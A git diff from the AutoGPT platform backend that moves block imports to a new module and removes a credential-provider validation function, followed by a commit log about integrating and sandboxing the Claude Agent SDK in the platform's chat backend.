-        logger.error(f"Error creating block instance for {block_cls.__name__}: {e}")
-        return True
-    logger.debug(
-        f"Checking if block {block_cls.__name__} has a valid provider configured"
-    )
-
-    # Get all credential inputs from input schema
-    credential_inputs = block.input_schema.get_credentials_fields_info()
-    required_inputs = block.input_schema.get_required_fields()
-    if not credential_inputs:
-        logger.debug(
-            f"Block {block_cls.__name__} has no credential inputs - Treating as valid"
-        )
-        return True
-
-    # Check credential inputs
-    if len(required_inputs.intersection(credential_inputs.keys())) == 0:
-        logger.debug(
-            f"Block {block_cls.__name__} has only optional credential inputs"
-            " - will work without credentials configured"
-        )
-
-    # Check if the credential inputs for this block are correctly configured
-    for field_name, field_info in credential_inputs.items():
-        provider_names = field_info.provider
-        if not provider_names:
-            logger.warning(
-                f"Block {block_cls.__name__} "
-                f"has credential input '{field_name}' with no provider options"
-                " - Disabling"
-            )
-            return False
-
-        # If a field has multiple possible providers, each one needs to be usable to
-        # prevent breaking the UX
-        for _provider_name in provider_names:
-            provider_name = _provider_name.value
-            if provider_name in ProviderName.__members__.values():
-                logger.debug(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"provider '{provider_name}' is part of the legacy provider system"
-                    " - Treating as valid"
-                )
-                break
-
-            provider = AutoRegistry.get_provider(provider_name)
-            if not provider:
-                logger.warning(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"refers to unknown provider '{provider_name}' - Disabling"
-                )
-                return False
-
-            # Check the provider's supported auth types
-            if field_info.supported_types != provider.supported_auth_types:
-                logger.warning(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"has mismatched supported auth types (field <> Provider): "
-                    f"{field_info.supported_types} != {provider.supported_auth_types}"
-                )
-
-            if not (supported_auth_types := provider.supported_auth_types):
-                # No auth methods are been configured for this provider
-                logger.warning(
-                    f"Block {block_cls.__name__} credential input '{field_name}' "
-                    f"provider '{provider_name}' "
-                    "has no authentication methods configured - Disabling"
-                )
-                return False
-
-            # Check if provider supports OAuth
-            if "oauth2" in supported_auth_types:
-                # Check if OAuth environment variables are set
-                if (oauth_config := provider.oauth_config) and bool(
-                    os.getenv(oauth_config.client_id_env_var)
-                    and os.getenv(oauth_config.client_secret_env_var)
-                ):
-                    logger.debug(
-                        f"Block {block_cls.__name__} credential input '{field_name}' "
-                        f"provider '{provider_name}' is configured for OAuth"
-                    )
-                else:
-                    logger.error(
-                        f"Block {block_cls.__name__} credential input '{field_name}' "
-                        f"provider '{provider_name}' "
-                        "is missing OAuth client ID or secret - Disabling"
-                    )
-                    return False
-
-        logger.debug(
-            f"Block {block_cls.__name__} credential input '{field_name}' is valid; "
-            f"supported credential types: {', '.join(field_info.supported_types)}"
-        )
-
-    return True
--- a/autogpt_platform/backend/backend/blocks/agent.py
+++ b/autogpt_platform/backend/backend/blocks/agent.py
@@ -1,7 +1,7 @@
 import logging
-from typing import TYPE_CHECKING, Any, Optional
+from typing import Any, Optional

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockInput,
@@ -9,15 +9,13 @@ from backend.blocks._base import (
    BlockSchema,
    BlockSchemaInput,
    BlockType,
+    get_block,
 )
 from backend.data.execution import ExecutionContext, ExecutionStatus, NodesInputMasks
 from backend.data.model import NodeExecutionStats, SchemaField
 from backend.util.json import validate_with_jsonschema
 from backend.util.retry import func_retry

-if TYPE_CHECKING:
-    from backend.executor.utils import LogMetadata
-
 _logger = logging.getLogger(__name__)


@@ -126,10 +124,9 @@ class AgentExecutorBlock(Block):
        graph_version: int,
        graph_exec_id: str,
        user_id: str,
-        logger: "LogMetadata",
+        logger,
    ) -> BlockOutput:

-        from backend.blocks import get_block
        from backend.data.execution import ExecutionEventType
        from backend.executor import utils as execution_utils

@@ -201,7 +198,7 @@ class AgentExecutorBlock(Block):
        self,
        graph_exec_id: str,
        user_id: str,
-        logger: "LogMetadata",
+        logger,
    ) -> None:
        from backend.executor import utils as execution_utils

--- a/autogpt_platform/backend/backend/blocks/ai_condition.py
+++ b/autogpt_platform/backend/backend/blocks/ai_condition.py
@@ -1,11 +1,5 @@
 from typing import Any

-from backend.blocks._base import (
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.llm import (
    DEFAULT_LLM_MODEL,
    TEST_CREDENTIALS,
@@ -17,6 +11,12 @@ from backend.blocks.llm import (
    LLMResponse,
    llm_call,
 )
+from backend.data.block import (
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import APIKeyCredentials, NodeExecutionStats, SchemaField


--- a/autogpt_platform/backend/backend/blocks/ai_image_customizer.py
+++ b/autogpt_platform/backend/backend/blocks/ai_image_customizer.py
@@ -6,7 +6,7 @@ from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient
 from replicate.helpers import FileOutput

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/ai_image_generator_block.py
+++ b/autogpt_platform/backend/backend/blocks/ai_image_generator_block.py
@@ -5,12 +5,7 @@ from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient
 from replicate.helpers import FileOutput

-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
+from backend.data.block import Block, BlockCategory, BlockSchemaInput, BlockSchemaOutput
 from backend.data.execution import ExecutionContext
 from backend.data.model import (
    APIKeyCredentials,
--- a/autogpt_platform/backend/backend/blocks/ai_music_generator.py
+++ b/autogpt_platform/backend/backend/blocks/ai_music_generator.py
@@ -6,7 +6,7 @@ from typing import Literal
 from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/ai_shortform_video_block.py
+++ b/autogpt_platform/backend/backend/blocks/ai_shortform_video_block.py
@@ -6,7 +6,7 @@ from typing import Literal

 from pydantic import SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/apollo/organization.py
+++ b/autogpt_platform/backend/backend/blocks/apollo/organization.py
@@ -1,10 +1,3 @@
-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.apollo._api import ApolloClient
 from backend.blocks.apollo._auth import (
    TEST_CREDENTIALS,
@@ -17,6 +10,13 @@ from backend.blocks.apollo.models import (
    PrimaryPhone,
    SearchOrganizationsRequest,
 )
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import CredentialsField, SchemaField


--- a/autogpt_platform/backend/backend/blocks/apollo/people.py
+++ b/autogpt_platform/backend/backend/blocks/apollo/people.py
@@ -1,12 +1,5 @@
 import asyncio

-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.apollo._api import ApolloClient
 from backend.blocks.apollo._auth import (
    TEST_CREDENTIALS,
@@ -21,6 +14,13 @@ from backend.blocks.apollo.models import (
    SearchPeopleRequest,
    SenorityLevels,
 )
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import CredentialsField, SchemaField


--- a/autogpt_platform/backend/backend/blocks/apollo/person.py
+++ b/autogpt_platform/backend/backend/blocks/apollo/person.py
@@ -1,10 +1,3 @@
-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.apollo._api import ApolloClient
 from backend.blocks.apollo._auth import (
    TEST_CREDENTIALS,
@@ -13,6 +6,13 @@ from backend.blocks.apollo._auth import (
    ApolloCredentialsInput,
 )
 from backend.blocks.apollo.models import Contact, EnrichPersonRequest
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.model import CredentialsField, SchemaField


--- a/autogpt_platform/backend/backend/blocks/ayrshare/_util.py
+++ b/autogpt_platform/backend/backend/blocks/ayrshare/_util.py
@@ -3,7 +3,7 @@ from typing import Optional

 from pydantic import BaseModel, Field

-from backend.blocks._base import BlockSchemaInput
+from backend.data.block import BlockSchemaInput
 from backend.data.model import SchemaField, UserIntegrations
 from backend.integrations.ayrshare import AyrshareClient
 from backend.util.clients import get_database_manager_async_client
--- a/autogpt_platform/backend/backend/blocks/basic.py
+++ b/autogpt_platform/backend/backend/blocks/basic.py
@@ -1,7 +1,7 @@
 import enum
 from typing import Any

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/block.py
+++ b/autogpt_platform/backend/backend/blocks/block.py
@@ -2,7 +2,7 @@ import os
 import re
 from typing import Type

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/branching.py
+++ b/autogpt_platform/backend/backend/blocks/branching.py
@@ -1,7 +1,7 @@
 from enum import Enum
 from typing import Any

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/claude_code.py
+++ b/autogpt_platform/backend/backend/blocks/claude_code.py
@@ -6,7 +6,7 @@ from typing import Literal, Optional
 from e2b import AsyncSandbox as BaseAsyncSandbox
 from pydantic import BaseModel, SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/code_executor.py
+++ b/autogpt_platform/backend/backend/blocks/code_executor.py
@@ -6,7 +6,7 @@ from e2b_code_interpreter import Result as E2BExecutionResult
 from e2b_code_interpreter.charts import Chart as E2BExecutionResultChart
 from pydantic import BaseModel, Field, JsonValue, SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/code_extraction_block.py
+++ b/autogpt_platform/backend/backend/blocks/code_extraction_block.py
@@ -1,6 +1,6 @@
 import re

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/codex.py
+++ b/autogpt_platform/backend/backend/blocks/codex.py
@@ -6,7 +6,7 @@ from openai import AsyncOpenAI
 from openai.types.responses import Response as OpenAIResponse
 from pydantic import SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/compass/triggers.py
+++ b/autogpt_platform/backend/backend/blocks/compass/triggers.py
@@ -1,6 +1,6 @@
 from pydantic import BaseModel

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockManualWebhookConfig,
--- a/autogpt_platform/backend/backend/blocks/count_words_and_char_block.py
+++ b/autogpt_platform/backend/backend/blocks/count_words_and_char_block.py
@@ -1,4 +1,4 @@
-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/data_manipulation.py
+++ b/autogpt_platform/backend/backend/blocks/data_manipulation.py
@@ -1,6 +1,6 @@
 from typing import Any, List

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/decoder_block.py
+++ b/autogpt_platform/backend/backend/blocks/decoder_block.py
@@ -1,6 +1,6 @@
 import codecs

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/discord/bot_blocks.py
+++ b/autogpt_platform/backend/backend/blocks/discord/bot_blocks.py
@@ -8,7 +8,7 @@ from typing import Any, Literal, cast
 import discord
 from pydantic import SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/discord/oauth_blocks.py
+++ b/autogpt_platform/backend/backend/blocks/discord/oauth_blocks.py
@@ -2,7 +2,7 @@
 Discord OAuth-based blocks.
 """

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/email_block.py
+++ b/autogpt_platform/backend/backend/blocks/email_block.py
@@ -7,7 +7,7 @@ from typing import Literal

 from pydantic import BaseModel, ConfigDict, SecretStr

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/encoder_block.py
+++ b/autogpt_platform/backend/backend/blocks/encoder_block.py
@@ -2,7 +2,7 @@

 import codecs

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/enrichlayer/linkedin.py
+++ b/autogpt_platform/backend/backend/blocks/enrichlayer/linkedin.py
@@ -8,7 +8,7 @@ which provides access to LinkedIn profile data and related information.
 import logging
 from typing import Optional

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/fal/ai_video_generator.py
+++ b/autogpt_platform/backend/backend/blocks/fal/ai_video_generator.py
@@ -3,13 +3,6 @@ import logging
 from enum import Enum
 from typing import Any

-from backend.blocks._base import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.blocks.fal._auth import (
    TEST_CREDENTIALS,
    TEST_CREDENTIALS_INPUT,
@@ -17,6 +10,13 @@ from backend.blocks.fal._auth import (
    FalCredentialsField,
    FalCredentialsInput,
 )
+from backend.data.block import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.data.execution import ExecutionContext
 from backend.data.model import SchemaField
 from backend.util.file import store_media_file
--- a/autogpt_platform/backend/backend/blocks/flux_kontext.py
+++ b/autogpt_platform/backend/backend/blocks/flux_kontext.py
@@ -5,7 +5,7 @@ from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient
 from replicate.helpers import FileOutput

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/checks.py
+++ b/autogpt_platform/backend/backend/blocks/github/checks.py
@@ -3,7 +3,7 @@ from typing import Optional

 from pydantic import BaseModel

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/ci.py
+++ b/autogpt_platform/backend/backend/blocks/github/ci.py
@@ -5,7 +5,7 @@ from typing import Optional

 from typing_extensions import TypedDict

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/issues.py
+++ b/autogpt_platform/backend/backend/blocks/github/issues.py
@@ -3,7 +3,7 @@ from urllib.parse import urlparse

 from typing_extensions import TypedDict

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/autogpt_platform/backend/backend/blocks/github/pull_requests.py
+++ b/autogpt_platform/backend/backend/blocks/github/pull_requests.py
@@ -2,7 +2,7 @@ import re

 from typing_extensions import TypedDict

-from backend.blocks._base import (
+from backend.data.block import (
    Block,
    BlockCategory,
    BlockOutput,
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Zamil Majdy	744fc59c18	fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts with http) and api_key are configured. Otherwise fall back to SDK default credentials so direct Anthropic usage still works.	2026-02-12 13:37:59 +04:00
Zamil Majdy	58847cd242	refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity Also adds gt=0 validation on claude_agent_max_budget_usd per PR review.	2026-02-12 13:36:48 +04:00
Zamil Majdy	d8453bb304	feat(chat/sdk): route SDK through OpenRouter with model config and usage tracking - Add sdk_model and sdk_max_budget_usd config fields for SDK-specific settings - Route SDK CLI API calls through OpenRouter via env vars (ANTHROPIC_BASE_URL, ANTHROPIC_AUTH_TOKEN) for per-call token/cost tracking - Pass model, env, user, and max_budget_usd to ClaudeAgentOptions - Emit StreamUsage from ResultMessage in response adapter - Persist token usage to session.usage in SDK streaming loop - Fix tracing to use configured model instead of hardcoded default - Update Anthropic fallback to use config.api_key/base_url (OpenRouter routing)	2026-02-12 13:12:42 +04:00
Zamil Majdy	d7f7a2747f	fix(backend/chat): Atomic message append to prevent race condition Replace the read-modify-write pattern in stream_chat_post with an atomic append_and_save_message helper that acquires the session lock before re-fetching and appending. This prevents message loss when concurrent requests modify the same session.	2026-02-12 09:10:43 +04:00
Zamil Majdy	68849e197c	format	2026-02-12 08:26:26 +04:00
Zamil Majdy	211478bb29	Revert "style: run ruff format and isort" This reverts commit `40b58807ab`.	2026-02-12 08:25:22 +04:00
Zamil Majdy	0e88dd15b2	feat(chat): add hook-based tracing integration for Claude Agent SDK - Add create_tracing_hooks() for fine-grained tool timing - Add merge_hooks() utility to combine security + tracing hooks - Captures precise pre/post timing for tool executions - Tracks tool failures via PostToolUseFailure hook - Integrates seamlessly with existing security hooks	2026-02-12 03:35:16 +00:00
Zamil Majdy	7f3c227f0a	feat(chat): add modular Langfuse tracing for Claude Agent SDK - Create tracing.py with TracedSession context manager - Automatically trace user messages, SDK messages, and results - Capture tool calls with input/output and timing - Log usage and cost from SDK ResultMessage - No-op when Langfuse not configured (zero overhead) - Clean integration into service.py via context manager	2026-02-12 03:33:37 +00:00
Zamil Majdy	40b58807ab	style: run ruff format and isort	2026-02-12 03:25:19 +00:00
Zamil Majdy	d0e2e6f013	security(service): strengthen path validation for SDK cleanup - Add empty check after session_id sanitization - Add assertion for defense-in-depth - Add explicit '..' traversal check in cleanup - Replace glob with os.listdir to avoid glob injection - Add validation that project_dir stays under ~/.claude/projects - Add warning logs for rejected paths Addresses CodeQL alert about uncontrolled data in path expression	2026-02-12 03:07:08 +00:00
Zamil Majdy	efdc8d73cc	fix(security_hooks): use json.dumps for pattern matching and log warning - Use json.dumps instead of str() for more predictable pattern matching - Log warning when SDK not available and security hooks are disabled Addresses CodeRabbit review feedback	2026-02-12 02:55:04 +00:00
Zamil Majdy	a34810d8a2	revert: remove Bash command extraction from GenericTool Keep it simple - just show 'Bash completed' instead of special handling to extract command names like 'jq completed'	2026-02-12 02:53:37 +00:00
Zamil Majdy	038b7d5841	feat(copilot): show specific command name for Bash tool - Extract command name (jq, grep, etc.) from Bash tool input - Display 'jq completed' instead of 'Bash completed' - Add ripgrep and tree to Dockerfile (match ALLOWED_BASH_COMMANDS)	2026-02-12 02:48:19 +00:00
Zamil Majdy	cac93b0cc9	fix(chat): increase SDK buffer limit and add jq - Add sdk_max_buffer_size config option (default 10MB, was 1MB) - Pass max_buffer_size to ClaudeAgentOptions to prevent crashes on large tool outputs - Install jq in Dockerfile for JSON processing capabilities Fixes AUTOGPT-SERVER-7V2	2026-02-12 02:41:12 +00:00
Zamil Majdy	2025aaf5f2	fix(backend/chat): Preserve full MCP tool output for frontend widgets The SDK CLI truncates large tool results (writing them to disk), which breaks frontend widget rendering (e.g., find_block's block list cards). Stash the full MCP tool output before the SDK sees it, then use the stash in the response adapter so the frontend always receives the complete JSON for proper widget parsing.	2026-02-11 23:13:42 +04:00
Zamil Majdy	ae9bce3bae	feat(backend/chat): Add sandboxed Bash and notify SDK of restrictions - Allow Bash tool with command allowlist (jq, grep, head, tail, etc.) validated via shlex.split for proper quote handling - Add workspace path validation for Bash absolute paths - Add SDK built-in tools (Read/Write/Edit/Glob/Grep/Bash) to allowed_tools - Append Bash restrictions to system prompt (SDK doesn't know our allowlist) - Add default_factory to BlockInfoSummary schema fields - Add 12 Bash sandbox tests covering safe/dangerous commands, substitution, redirection, /dev/ access, path escaping	2026-02-11 22:35:39 +04:00
Zamil Majdy	3107d889fc	feat(frontend/copilot): Add generic tool widget for unrecognized tools SDK built-in tools (Read, Glob, Grep, etc.) have no dedicated frontend widget, so tool calls silently disappeared. Add a GenericTool component that shows a spinning gear + "Running {tool}…" for any tool-* part type that doesn't match a known case.	2026-02-11 22:08:03 +04:00
Zamil Majdy	f174fb6303	fix(backend/chat): Strip MCP prefix from SDK tool names for frontend rendering The Vercel AI SDK frontend renders tool widgets based on tool name (e.g. "tool-find_block", "tool-run_agent"). The SDK sends tool names with the MCP prefix (mcp__copilot__find_block) which didn't match any frontend switch case, causing tool execution to be invisible. Strip the mcp__copilot__ prefix in the response adapter so tool events reach the correct frontend widget handlers.	2026-02-11 22:01:59 +04:00
Zamil Majdy	920a4c5f15	feat(backend/chat): Allow Read/Write/Edit/Glob/Grep in SDK within workspace Move these tools from fully-blocked to workspace-scoped: they are now allowed when the file path stays within the SDK working directory (/tmp/copilot-<session>/) or the tool-results directory (~/.claude/projects/…/tool-results/). This enables the SDK's built-in oversized tool result handling and workspace file operations. - Add _validate_workspace_path() with normpath-based path validation - Pass sdk_cwd from service.py into create_security_hooks() - Add 20 unit tests covering allowed/denied paths, traversal attacks	2026-02-11 20:39:33 +04:00
Zamil Majdy	e95fadbb86	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-11 20:23:56 +04:00
Zamil Majdy	b14b3803ad	feat(backend/chat): Add StreamStartStep/StreamFinishStep to SDK adapter The non-SDK path emits step boundaries (StartStep/FinishStep) around each LLM turn and tool cycle. The SDK adapter was missing these, causing the frontend to lack visual step framing for tool calls. Now the SDK adapter emits: - StreamStartStep after init and before each new LLM turn - StreamFinishStep after tool results and before final finish	2026-02-11 20:18:27 +04:00
Zamil Majdy	82c483d6c8	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-11 07:17:38 +04:00
Zamil Majdy	7cffa1895f	fix(backend/chat): Filter duplicate StreamStart from non-SDK path Routes.py already publishes a StreamStart before calling the service. The SDK path filters the duplicate internally, but the non-SDK path did not, causing two StreamStart events to reach the frontend.	2026-02-11 06:52:47 +04:00
Zamil Majdy	9791bdd724	fix(backend/chat): Use normpath+startswith pattern for CodeQL path sanitization CodeQL doesn't recognize re.sub as a path sanitizer. Switch to the os.path.normpath + startswith prefix check pattern that CodeQL's taint model explicitly recognizes as breaking the taint chain.	2026-02-11 06:45:12 +04:00
Zamil Majdy	750a674c78	fix lock	2026-02-11 06:39:03 +04:00
Zamil Majdy	960c7980a3	fix(backend/chat): Use named helper for session_id sanitization to satisfy CodeQL Replace inline comprehension with _sanitize_session_id() using re.sub so CodeQL recognizes the path-traversal sanitization barrier.	2026-02-11 06:32:16 +04:00
Zamil Majdy	e85d437bb2	fix(backend/chat): Sanitize session_id in SDK cwd path to prevent path traversal	2026-02-11 06:26:48 +04:00
Zamil Majdy	44f9536bd6	fix lock	2026-02-11 06:24:41 +04:00
Zamil Majdy	1c1085a227	Merge remote-tracking branch 'origin/dev' into feat/copitlot-claude-code # Conflicts: # autogpt_platform/backend/backend/api/features/chat/config.py # autogpt_platform/backend/poetry.lock	2026-02-11 05:30:46 +04:00
Zamil Majdy	d7ef70469e	fix(backend/chat): Fix cleanup race condition and move to outer finally - Use session-specific temp dir (/tmp/copilot-{session_id}) as SDK cwd to prevent concurrent sessions from deleting each other's tool-result files during cleanup - Move _cleanup_sdk_tool_results() to outer finally block so it runs even when the outer except Exception fires - Clean up the temp cwd directory after each session - Remove unnecessary inner try/finally nesting	2026-02-11 05:13:02 +04:00
Zamil Majdy	1926127ddd	fix(backend/chat): Fix bugs and remove dead code in SDK integration - Fix message accumulation bug: reset has_appended_assistant when creating new post-tool assistant message to prevent lost text deltas - Fix hardcoded model in anthropic_fallback.py: use config.model instead of hardcoded "claude-sonnet-4-20250514" - Fix _SDK_TOOL_RESULTS_DIR using hardcoded /root/ path: use expanduser - Remove unused create_strict_security_hooks (~75 lines) - Remove unused create_heartbeat/create_usage from response adapter - Remove unused RAW_TOOL_NAMES from tool_adapter - Extract _MAX_TOOL_ITERATIONS constant from magic number	2026-02-11 04:42:05 +04:00
Zamil Majdy	8b509e56de	refactor(backend/chat): Replace --resume with conversation context, add compaction and dedup - Remove broken --resume/session file approach (CLI v2.1.38 can't load >2 message session files) and delete session_file.py + tests - Embed prior conversation turns as <conversation_history> context in the user message for multi-turn memory - Add context compaction using shared compress_context() from prompt.py with LLM summarization + truncation fallback for long conversations - Reuse _build_system_prompt and _generate_session_title from parent service.py instead of duplicating (gains Langfuse prompt support) - Add has_conversation_history param to _build_system_prompt to avoid greeting on multi-turn conversations - Fix _SDK_TOOL_RESULTS_GLOB from hardcoded /root/ to expanduser ~/	2026-02-11 04:22:11 +04:00
Zamil Majdy	acb2d0bd1b	fix(backend/chat): Resolve symlinks in session file path for --resume The CLI resolves symlinks when computing its project directory (e.g. /tmp -> /private/tmp on macOS), so our session file writes must use the resolved path to match. Also adds cwd to ClaudeAgentOptions and debug logging for SDK messages.	2026-02-10 20:11:16 +04:00
Zamil Majdy	51aa369c80	fix(backend): Restore PyYAML cp38 wheel entries in poetry.lock Re-add Python 3.8 wheel entries for PyYAML that were dropped by poetry lock resolution, keeping the lockfile consistent with dev.	2026-02-10 20:06:45 +04:00
Zamil Majdy	6403ffe353	fix(backend/chat): Use --resume with session files for multi-turn conversations Replace broken AsyncIterable approach (CLI rejects assistant-type stdin messages) with JSONL session files written to the CLI's storage directory. This enables --resume to load full user+assistant context with turn-level compaction support for long conversations.	2026-02-10 18:46:33 +04:00
Zamil Majdy	c40a98ba3c	Merge branches 'feat/copitlot-claude-code' and 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code	2026-02-10 18:19:23 +04:00
Zamil Majdy	a31fc8b162	refactor(backend/chat): Use proper SDK types and in-memory conversation history Replace duck typing (class name checks, getattr) with isinstance() using SDK-exported dataclasses. Replace file-based --resume with AsyncIterable message injection for conversation history, eliminating disk I/O. Add 15 unit tests for the response adapter.	2026-02-10 18:17:00 +04:00
Zamil Majdy	0f2d1a6553	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-10 17:23:06 +04:00
Zamil Majdy	87d817b83b	fix(backend/chat): Allow MCP-registered tools through security hook and fix title generation - Skip BLOCKED_TOOLS check for tools with mcp__copilot__ prefix since they are already sandboxed by tool_adapter (fixes Read tool being blocked) - Fall back to session.messages for title generation when message=None	2026-02-10 17:15:42 +04:00
Zamil Majdy	acf932bf4f	refactor(backend/chat): Move glob/os imports to top-level in SDK service	2026-02-10 16:57:11 +04:00
Zamil Majdy	f562d9a277	fix(backend/chat): Add Read tool for SDK oversized tool results The Claude Agent SDK saves tool results exceeding its token limit to files and instructs the agent to read them back with a Read tool. Our MCP server didn't have this tool, breaking the agent on large results like run_block output (117K+ chars). Changes: - Add a Read tool to the MCP server (restricted to /root/.claude/) - Register it in COPILOT_TOOL_NAMES so the SDK can use it - Add safety-net truncation at 500K chars for extreme cases - Clean up SDK tool-result files after each client session	2026-02-10 16:53:04 +04:00
Zamil Majdy	3c92a96504	fix(backend/chat): Publish StreamError before StreamFinish on error paths When run_ai_generation() or event_generator() encounter errors, they were only publishing StreamFinish without a preceding StreamError. The frontend treats finish-without-error as normal completion, leaving the user with an apparently stuck/empty response requiring a page refresh.	2026-02-10 15:49:23 +04:00
Zamil Majdy	8b8e1df739	fix(backend/chat): Auto-expire stale running tasks to unblock sessions Tasks stuck in "running" status beyond stream_timeout (300s) are now auto-marked as failed when looked up, preventing zombie tasks from blocking the session indefinitely.	2026-02-10 15:35:43 +04:00
Zamil Majdy	602a0a4fb1	fix(backend/chat): Strip tool call noise from conversation history context	2026-02-10 14:11:27 +04:00
Zamil Majdy	8d7d531ae0	refactor(backend/chat): Remove unused max_context_messages config	2026-02-10 13:57:33 +04:00
Zamil Majdy	43153a12e0	fix(backend/chat): Remove manual context truncation from SDK path, let SDK handle compaction	2026-02-10 13:52:49 +04:00
Zamil Majdy	587e11c60a	refactor(backend/chat): Extract MCP server name constants to avoid hardcoded strings	2026-02-10 12:12:08 +04:00
Zamil Majdy	57da545e02	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-10 12:10:35 +04:00
Zamil Majdy	626980bf27	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-09 19:26:52 +04:00
Swifty	e42b27af3c	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-09 09:12:23 +01:00
Zamil Majdy	34face15d2	fix lock	2026-02-09 11:45:59 +04:00
Zamil Majdy	7d32c83f95	fix(backend/chat): Handle non-serializable SDK objects in tool result output	2026-02-09 10:59:50 +04:00
Zamil Majdy	6e2a45b84e	style(backend): Remove unused pytest import in execution_queue_test	2026-02-09 10:14:20 +04:00
Zamil Majdy	32f6532e9c	Merge branch 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code	2026-02-09 10:10:32 +04:00
Zamil Majdy	0bbe8a184d	Merge dev and resolve poetry.lock conflict	2026-02-08 19:40:17 +04:00
Zamil Majdy	7592deed63	fix(backend/chat): Address remaining PR review comments - Fix tool_call_id always being "sdk-call" by generating unique IDs per invocation - Fix validation using original tool_name instead of clean_name in security hooks - Fix duplicate StreamFinish in Anthropic fallback path - Fix ImportError fallback returning plain dict instead of re-raising - Extract _build_input_schema helper to deduplicate schema construction - Add else branch for unhandled SDK message types for observability - Truncate large tool results in conversation history to prevent context overflow	2026-02-08 19:39:10 +04:00
